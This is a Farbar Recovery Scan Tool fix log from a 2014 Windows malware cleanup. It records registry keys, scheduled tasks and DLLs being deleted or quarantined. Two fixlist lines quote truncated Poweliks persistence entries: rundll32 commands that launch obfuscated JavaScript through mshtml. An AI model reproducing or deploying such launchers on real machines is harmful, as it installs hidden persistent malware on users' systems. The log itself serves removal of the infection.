Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 26-10-2014
Ran by Jeremy at 2014-10-26 16:57:28 Run:1
Running from C:\Users\Jeremy\Desktop
Loaded Profile: Jeremy (Available profiles: Jeremy)
Boot Mode: Normal
==============================================
Content of fixlist:
*****************
start
HKLM-x32\...\Run: [] => [X]
Winlogon\Notify\ScCertProp: wlnotify.dll [X]
HKU\S-1-5-21-2021864660-184726159-3145544098-1000\...\MountPoints2: {abafe4c4-4917-11e4-a441-806e6f6e6963} - D:\DWA140.EXE
HKU\S-1-5-21-2021864660-184726159-3145544098-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5}
download.eset.com/special/eos/OnlineScanner.cab2014-10-25 19:26 - 2014-10-25 19:26 - 00000000 _____ () C:\Windows\system32\hozek.dll
2014-10-25 19:25 - 2014-10-25 19:25 - 00070656 _____ () C:\Windows\system32\ymkhh.dll
2014-10-25 19:25 - 2014-10-25 19:25 - 00029184 _____ () C:\Users\Jeremy\AppData\Roaming\xitus.dll
C:\Users\Jeremy\AppData\Local\Temp\Quarantine.exe
C:\Users\Jeremy\AppData\Local\Temp\sqlite3.dll
CustomCLSID: HKU\S-1-5-21-2021864660-184726159-3145544098-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
Task: {8F068C8D-F941-4F7C-AF2A-3EC890FAAD4E} - System32\Tasks\{5AD3E9FF-D154-89FB-EF82-0F3E260DFDC4} => C:\Windows\system32\ymkhh.dll [2014-10-25] ()
end
*****************
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ScCertProp" => Key deleted successfully.
"HKU\S-1-5-21-2021864660-184726159-3145544098-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{abafe4c4-4917-11e4-a441-806e6f6e6963}" => Key deleted successfully.
"HKCR\CLSID\{abafe4c4-4917-11e4-a441-806e6f6e6963}" => Key not found.
"HKU\S-1-5-21-2021864660-184726159-3145544098-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-2021864660-184726159-3145544098-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Code Store Database\Distribution Units\{7530BFB8-7293-4D34-9923-61A11451AFC5}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{7530BFB8-7293-4D34-9923-61A11451AFC5}" => Key not found.
Could not move "C:\Windows\system32\hozek.dll" => Scheduled to move on reboot.
C:\Windows\system32\ymkhh.dll => Moved successfully.
C:\Users\Jeremy\AppData\Roaming\xitus.dll => Moved successfully.
C:\Users\Jeremy\AppData\Local\Temp\Quarantine.exe => Moved successfully.
C:\Users\Jeremy\AppData\Local\Temp\sqlite3.dll => Moved successfully.
"HKU\S-1-5-21-2021864660-184726159-3145544098-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{8F068C8D-F941-4F7C-AF2A-3EC890FAAD4E}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8F068C8D-F941-4F7C-AF2A-3EC890FAAD4E}" => Key deleted successfully.
C:\Windows\System32\Tasks\{5AD3E9FF-D154-89FB-EF82-0F3E260DFDC4} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{5AD3E9FF-D154-89FB-EF82-0F3E260DFDC4}" => Key deleted successfully.
=> Result of Scheduled Files to move (Boot Mode: Normal) (Date&Time: 2014-10-26 16:58:52)<=
C:\Windows\system32\hozek.dll => Is moved successfully.
==== End of Fixlog ====